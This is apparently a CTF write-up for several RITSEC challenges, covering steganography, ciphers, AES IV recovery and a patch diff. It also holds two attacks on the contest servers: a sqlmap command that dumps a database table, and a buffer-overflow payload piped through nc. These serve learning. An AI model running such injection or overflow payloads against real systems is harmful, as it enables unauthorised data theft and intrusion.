- A+
Space Force
The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters. Check it out at fun.ritsec.club:8005!
Opening the site, it appears to offer a search function.
Capture a request and try injection:
```http
POST /index.php HTTP/1.1
Host: fun.ritsec.club:8005
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fun.ritsec.club:8005/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Connection: keep-alive
Upgrade-Insecure-Requests: 1

name=The+Javelin
```
```shell
sqlmap -r burp.txt -D challenge -T spaceships --dump
```
flag:RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx}
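The form posts a single `name` field and the saved request went straight into sqlmap. As an added example (not part of the write-up), the following uses an in-memory SQLite stand-in for the challenge's `spaceships` table to show the string-built query that makes such a dump possible beside the parameterised version that does not; the schema and rows are constructed.

```python
# Added example (not from the original write-up): why the `name` search was
# injectable, and the one-line fix. Database contents below are constructed.
import sqlite3

def make_db():
    """In-memory stand-in for the challenge database (constructed schema and rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE spaceships (name TEXT, pilot TEXT)")
    con.executemany("INSERT INTO spaceships VALUES (?, ?)",
                    [("The Javelin", "pilot A"), ("The Trident", "pilot B")])
    return con

def search_unsafe(con, name):
    # Vulnerable: the POSTed name is spliced into the SQL text, so a quote in it
    # closes the literal and whatever follows is parsed as SQL.
    sql = "SELECT name FROM spaceships WHERE name = '%s'" % name
    return [row[0] for row in con.execute(sql)]

def search_safe(con, name):
    # Hardened: the value is bound as a parameter, so quotes inside it stay data.
    sql = "SELECT name FROM spaceships WHERE name = ?"
    return [row[0] for row in con.execute(sql, (name,))]

if __name__ == "__main__":
    con = make_db()
    print(search_unsafe(con, "The Javelin"), search_safe(con, "The Javelin"))
```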
Burn the candle on both ends
The usual routine: a zip is hidden inside the file, so just carve it out.
It is password-protected, though; after a very long brute force the password turns out to be stegosaurus.
flag:RITSEC{8U51N355-1N-7H3-Fr0N7-P4r7Y-1N-7H3-84CK}
I am a Stegosaurus
Download the image. It will not open on Linux, probably because the height or width was altered; on Windows it opens directly, and the flag is at the bottom of the picture.
flag:RITSEC{th1nk_0uts1d3_th3_b0x}
Nobody uses the eggplant emoji
This is a wild one: the ciphertext is made entirely of emoji.
Challenge:
Notice that the emoji are interspersed with underscores, so try converting each distinct emoji to a different letter, which gives
得到ABCDEFCGHAIJCDEFCKLMCNELGHDCEBCGHMCBOKPCBALQGCDEFCRFQGCKIQNMLCGHMQMCGHLMMCSFMQGAEIQTCNHKGCAQCDEFCIKRMUCNHKGCAQCDEFLCSFMQGUCNHKGCAQCGHMCKALCQVMMWCXMOEYAGDCEBCKICFIOKWMICQNKOOENTCDEFLCBOKPCAQZCKBLAYKI[EL[MFLEVMKI[QNKOOEN[NEN[GHMLMQ[K[WABBMLMIYMC
Frequency analysis then gives IFSYOUSTHINGSYOUSARESWORTHYSOFSTHESFLAMSFIRDTSYOUSJUDTSANDWERSTHEDESTHREESQUEDTIONDPSWHATSIDSYOUSNAJEVSWHATSIDSYOURSQUEDTVSWHATSIDSTHESAIRSDBEEKSZELOCITYSOFSANSUNLAKENSDWALLOWPSYOURSFLAMSIDXSAFRICAN[OR[EUROBEAN[DWALLOW[WOW[THERED[A[KIFFERENCES
After substituting the characters:
flag:RITSEC{african_or_european_swallow_wow_theres_a_difference}
Who drew on my program?
Download the image.
A Baidu search suggests this is a rehash of an earlier challenge: https://github.com/dqi/ctf_writeup/tree/master/2015/tmctf/crypto200
It is very similar to that one,
which also had some key information crossed out and asked for the flag. Here is its payload:
```python
#!/usr/bin/python
# Python 2 / PyCrypto script from the referenced TMCTF 2015 write-up
from Crypto.Cipher import AES
import binascii
import string
import itertools

# given
bKEY = "5d6I9pfR7C1JQt"
# use null bytes to minimize effect on output
IV = "\x00"*16

def encrypt(message, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.encrypt(message)

def decrypt(cipher, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.decrypt(cipher)

pt = "The message is protected by AES!"
ct = "fe000000000000000000000000009ec3307df037c689300bbf2812ff89bc0b49"

# find the key using the plaintext and ciphertext we know, since the IV has no effect
# on the decryption of the second block (only bytes 0, 14 and 15 of block 1 are known)
for i in itertools.product(string.printable, repeat=2):
    eKEY = ''.join(i)
    KEY = bKEY + eKEY
    ptc = decrypt(binascii.unhexlify(ct), KEY)
    if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]:
        print "Got KEY: " + str(KEY)
        fKEY = KEY

pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:]
print "Decrypting with CT mostly zeroes gives: " + pt2
print "Should be: " + binascii.hexlify(pt[16:])

# we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i]),
# since we chose ct 00 in all the positions we are going to recover
answer = ""
for i in range(13):
    pi = pt[17+i]            # letters from the plaintext
    pti = pt2[2*i+2:2*i+4]   # 2 hex letters from decryption of second block
    answer += "%02X" % (ord(pi) ^ int(pti, 16))
rct = ct[0:2] + answer.lower() + ct[28:]
print "Which means CT was: " + rct

# now we can decrypt the recovered ct and xor against the pt to recover the IV
wpt = decrypt(binascii.unhexlify(rct), fKEY)
IV = ""
for i in range(16):
    p = ord(pt[i]) ^ ord(wpt[i])
    IV += "%02X" % p
IV = binascii.unhexlify(IV)

# sanity check:
aes = AES.new(fKEY, AES.MODE_CBC, IV)
print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct))
# We won!
print "The IV is: " + IV
```
Replace bKEY and ct with the values from our challenge:
```python
#!/usr/bin/python
# Same Python 2 / PyCrypto script, with this challenge's key prefix and ciphertext
from Crypto.Cipher import AES
import binascii
import string
import itertools

# given
bKEY = "9aF738g9AkI112"
# use null bytes to minimize effect on output
IV = "\x00"*16

def encrypt(message, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.encrypt(message)

def decrypt(cipher, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.decrypt(cipher)

pt = "The message is protected by AES!"
ct = "9e00000000000000000000000000436a808e200a54806b0e94fb9633db9d67f0"

# find the key using the plaintext and ciphertext we know, since the IV has no effect
# on the decryption of the second block (only bytes 0, 14 and 15 of block 1 are known)
for i in itertools.product(string.printable, repeat=2):
    eKEY = ''.join(i)
    KEY = bKEY + eKEY
    ptc = decrypt(binascii.unhexlify(ct), KEY)
    if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]:
        print "Got KEY: " + str(KEY)
        fKEY = KEY

pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:]
print "Decrypting with CT mostly zeroes gives: " + pt2
print "Should be: " + binascii.hexlify(pt[16:])

# we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i]),
# since we chose ct 00 in all the positions we are going to recover
answer = ""
for i in range(13):
    pi = pt[17+i]            # letters from the plaintext
    pti = pt2[2*i+2:2*i+4]   # 2 hex letters from decryption of second block
    answer += "%02X" % (ord(pi) ^ int(pti, 16))
rct = ct[0:2] + answer.lower() + ct[28:]
print "Which means CT was: " + rct

# now we can decrypt the recovered ct and xor against the pt to recover the IV
wpt = decrypt(binascii.unhexlify(rct), fKEY)
IV = ""
for i in range(16):
    p = ord(pt[i]) ^ ord(wpt[i])
    IV += "%02X" % p
IV = binascii.unhexlify(IV)

# sanity check:
aes = AES.new(fKEY, AES.MODE_CBC, IV)
print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct))
# We won!
print "The IV is: " + IV
```
flag:RITSEC{b4dcbc#g}
Talk to me
Join the channel: https://discord.gg/p7tHuSq
Search for RITSEC
flag:RITSEC{its_like_irc-but_with_2_much_javascript}
Patch Patch
Look at the patch-patch-patch file:
diff -ur patch-2.7.1/src/patch.c patch-2.7.1.1/src/patch.c
--- patch-2.7.1/src/patch.c 2018-11-02 01:12:30.625613158 -0400
+++ patch-2.7.1.1/src/patch.c 2018-11-02 01:13:21.498608985 -0400
@@ -1953,9 +1953,9 @@
fatal_exit (int sig)
{
cleanup ();
-#ifdef backdoor
- printf("Looks like we got a vulnerability here");
-#endif
+
+/* Removed a super bad vuln here */
+
if (sig)
exit_with_signal (sig);
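Review bot: this hunk changes no code that is compiled by default; the three deleted lines sit inside `#ifdef backdoor`, so they only reach the binary if that macro is defined somewhere in the build, and the replacement comment `/* Removed a super bad vuln here */` claims a fix the diff does not actually make. Before accepting the comment at face value, check where `backdoor` could be defined (the configure script, CFLAGS) and ask for a commit message that states what really changed.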
Nothing useful here. Looking at patch-2.7.1-10.el7.centos.src instead and extracting all of it, the configure script inside patch-2.7.1 contains something odd:
```shell
TEST=$(echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`)
```
It is a bash snippet (the second echo spells out the command it pipes into); let's run it:
```console
echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`
RITSEC{VULNS_4R3_BAD_}
```
flag:RITSEC{VULNS_4R3_BAD_}
What_Th._Fgck
The challenge gives only this:
OGK:DI_G;lqk"Kj1;"a"yao";fr3dog0o"vdtnsaoh"patsfk{+
This is Dvorak; below is the Dvorak keyboard layout diagram.
Decode it directly with a tool
to get the plaintext RITSEC{Isn't”Th1s”a”far”sup3eri0r”keyboard”layout?}
Change the double quotes to underscores and that is the flag.
flag:RITSEC{Isn't_Th1s_a_far_sup3eri0r_keyboard_layout?}
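The decoding step is a fixed key-position mapping between the US QWERTY and Dvorak layouts. As an added example (not part of the write-up), the following implements it in Python over both the unshifted and shifted rows; because the shifted punctuation is mapped too, the `"` characters come out as `_` directly, which the write-up did by hand.

```python
# Added example (not from the original write-up): decode the challenge string by
# reading, for every character, the Dvorak key that sits at the same physical
# position as that character's QWERTY key. Shifted characters are mapped too,
# which is why the double quotes come out as underscores directly.

# US QWERTY and US Dvorak layouts, unshifted then shifted, in the same key order.
QWERTY = ("`1234567890-=qwertyuiop[]\\asdfghjkl;'zxcvbnm,./"
          "~!@#$%^&*()_+QWERTYUIOP{}|ASDFGHJKL:\"ZXCVBNM<>?")
DVORAK = ("`1234567890[]',.pyfgcrl/=\\aoeuidhtns-;qjkxbmwvz"
          "~!@#$%^&*(){}\"<>PYFGCRL?+|AOEUIDHTNS_:QJKXBMWVZ")
assert len(QWERTY) == len(DVORAK) == 94

_Q2D = str.maketrans(QWERTY, DVORAK)
_D2Q = str.maketrans(DVORAK, QWERTY)

def qwerty_to_dvorak(text: str) -> str:
    """Text given as QWERTY key names, read as the Dvorak characters on those keys.
    Characters outside both layouts (e.g. space) pass through unchanged."""
    return text.translate(_Q2D)

def dvorak_to_qwerty(text: str) -> str:
    """Inverse mapping, useful to check that a decode round-trips."""
    return text.translate(_D2Q)

# Ciphertext exactly as given in the challenge
CHALLENGE = 'OGK:DI_G;lqk"Kj1;"a"yao";fr3dog0o"vdtnsaoh"patsfk{+'

if __name__ == "__main__":
    print(qwerty_to_dvorak(CHALLENGE))
```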
RIP
This one gives an image and a piece of ciphertext:
+[----->+++<]>+.++++++++++++..----.+++.+[-->+<]>.-----------..++[--->++<]>+...---[++>---<]>.--[----->++<]>+.----------.++++++.-.+.+[->+++<]>.+++.[->+++<]>-.--[--->+<]>-.++++++++++++.--.+++[->+++++<]>-.++[--->++<]>+.-[->+++<]>-.--[--->+<]>-.++[->+++<]>+.+++++.++[->+++<]>+.----[->++<]>.[-->+<]>++.+++++++++.--[------>+<]>.--[-->+++<]>--.+++++++++++++.----------.>--[----->+<]>.-.>-[--->+<]>--.++++.---------.-.
Decoding it yields a link, https://www.youtube.com/watch?v=F6LYOfeSWNM
Nothing useful there, so back to the image. The odd thing about it is the small coloured squares around its border; a quick search shows these are a programming language, Piet. Strip out the rest of the image
and decode it online.
flag:RITSEC{WH4AT_TH3_P13T_1337}
Check out this cool filter
I had no clue on this one; I only understood it after reading a strong player's write-up:
```python
from PIL import Image

img = Image.open('CheckOutThisFilter.png').convert('RGB')
w, h = img.size
codes = []
for y in range(0, h):
    for x in range(0, w):
        r, g, b = img.getpixel((x, y))
        codes.append(b)  # collect the blue channel of every pixel, row by row
codes = codes[:51]
flag = ''
for code in codes:
    flag += chr(code - 13)
print(flag)
```
flag:RITSEC{TIL_JPEG_COMPRESSION_MESSES_WITH_RGB_VALUES}
music.png
This one was also an eye-opener: it is a new kind of music called "bytebeat".
Use a script to extract the code from the image:
```python
from PIL import Image

img = Image.open('music.png').convert('RGB')
w, h = img.size
r_str = ''
g_str = ''
b_str = ''
for y in range(0, h):
    for x in range(0, w):
        r, g, b = img.getpixel((x, y))
        r_str += chr(r)   # each colour channel carries one piece of the formula text
        g_str += chr(g)
        b_str += chr(b)
s = r_str[:32] + g_str[:38] + b_str[:66]
print(s)
```
which gives
```javascript
(t<<3)*[8/9,1,9/8,6/5,4/3,3/2,0][[0xd2d2c7,0xce4087,0xca32c7,0x8e4008][t>>14&3.1]>>(0x3dbe4687>>((t>>10&15)>9?18:t>>10&15)*3&7.1)*3&7.1]
```
Run it in an online tool.
It plays a piece of music; song recognition identifies it as "Never Gonna Give You Up".
So the flag is: RITSEC{never_gonna_give_you_up}
For an introduction to bytebeat, click here.
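The formula above is JavaScript meant for a browser bytebeat player, which evaluates it for t = 0, 1, 2, ... at 8 kHz and plays the low 8 bits of each result. As an added example (not from the write-up), the following renders it offline to a WAV file in Python; the masks 3.1 and 7.1 act as 3 and 7 under JavaScript's bitwise operators, and an out-of-range ratio index, which JavaScript turns into a 0 sample, is handled explicitly.

```python
# Added example (not from the original write-up): render the bytebeat formula
# recovered from music.png to a WAV file using only the standard library.
import wave

# Constants lifted from the recovered formula. JavaScript indexing past the end of
# the ratio list gives undefined -> NaN, which becomes a 0 sample; Python needs a guard.
RATIOS = [8/9, 1, 9/8, 6/5, 4/3, 3/2, 0]
SEQUENCES = [0xd2d2c7, 0xce4087, 0xca32c7, 0x8e4008]

def bytebeat_sample(t: int) -> int:
    """Output byte for sample index t; the JS expression translated to Python.

    The original masks are written 3.1 and 7.1: JS bitwise operators truncate their
    operands to 32-bit integers, so they act as 3 and 7.
    """
    step = t >> 10 & 15                       # 16-step sequencer position
    shift = (18 if step > 9 else step) * 3    # JS: (t>>10&15)>9?18:t>>10&15
    note = SEQUENCES[t >> 14 & 3] >> ((0x3dbe4687 >> shift) & 7) * 3 & 7
    ratio = RATIOS[note] if note < len(RATIOS) else 0
    return int((t << 3) * ratio) & 0xFF       # JS Uint8 conversion: truncate, mod 256

def render_bytes(seconds: float, rate: int = 8000) -> bytes:
    """Raw unsigned 8-bit samples for the first `seconds` of the tune."""
    return bytes(bytebeat_sample(t) for t in range(int(seconds * rate)))

def render_wav(path: str, seconds: float = 10.0, rate: int = 8000) -> int:
    """Write 8-bit mono PCM to `path` and return the number of samples written."""
    frames = render_bytes(seconds, rate)
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(1)
        w.setframerate(rate)
        w.writeframes(frames)
    return len(frames)

if __name__ == "__main__":
    render_wav("bytebeat.wav")
```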
ezpwn
Load it in IDA.
The code is roughly:
```c
#include <stdio.h>

// Rough reconstruction of the decompiled main() as shown in IDA
int main(){
    int x = 0;
    int y = 0;
    char buffer;
    FILE *f;
    puts("Please enter your API key");
    gets(&buffer);            // unbounded read: input past `buffer` overwrites x
    f = fopen("flag.txt","r");
    if(x==1){
        while(y != -1){
            y=fgetc(f); // Acts like the decrement
            putchar(y);
            fclose(f);
        }
    }
    printf("%d\n",x);
}
```
x is initialised to 0, but the flag is read only when x == 1. The key function is still gets, which lets us change the value of x; first determine the offset:
```console
└──╼ $./ezpwn
Please enter your API key
aaaabaaacaaadaaaeaaafaaagaaaha
1633771879
```
cyclic gives an offset of 24. Write a flag.txt locally and construct the payload:
```console
└──╼ $python -c 'print "A"*24 +"\x01" ' | ./ezpwn
Please enter your API key
flag{666666}
1
```
Works locally.
```console
root@kali:~/pwn# python -c "print 'a'*24 + '\x01\x00\x00\x00'"| nc fun.ritsec.club 8001
Please enter your API key
RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}1
```
Got the flag.
flag:RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}
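The write-up reads the offset 24 off the leaked value 1633771879 with cyclic. As an added example (not from the write-up), the following reimplements the pattern generation and lookup that pwntools' `cyclic` / `cyclic_find` perform, so the number can be checked rather than taken on trust: 1633771879 is 0x61616167, which stored little-endian is the bytes "gaaa", and that 4-gram occurs exactly once in the pattern, at position 24.

```python
# Added example (not from the original write-up): reproduce how cyclic / cyclic_find
# turn the leaked value 1633771879 into an offset of 24.
import struct
from itertools import islice
from string import ascii_lowercase

def de_bruijn(alphabet: str = ascii_lowercase, n: int = 4):
    """Yield the de Bruijn sequence B(k, n): every length-n string over the
    alphabet occurs exactly once, so any n consecutive bytes identify their position."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for c in a[1:p + 1]:
                    yield alphabet[c]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def cyclic(length: int, n: int = 4) -> str:
    """First `length` characters of the pattern (pwntools' cyclic() uses the same sequence)."""
    return "".join(islice(de_bruijn(ascii_lowercase, n), length))

def cyclic_find(value: int, n: int = 4) -> int:
    """Offset in the pattern of the n-byte word a little-endian 32-bit int was read from."""
    needle = struct.pack("<I", value).decode("latin-1")
    pattern = cyclic(len(ascii_lowercase) ** n, n)
    pattern += pattern[:n - 1]            # the sequence is cyclic; cover the wrap-around
    return pattern.find(needle)

if __name__ == "__main__":
    print(cyclic(30))                     # aaaabaaacaaadaaaeaaafaaagaaaha
    print(cyclic_find(1633771879))        # 24: bytes 24..27 of the input landed in x
```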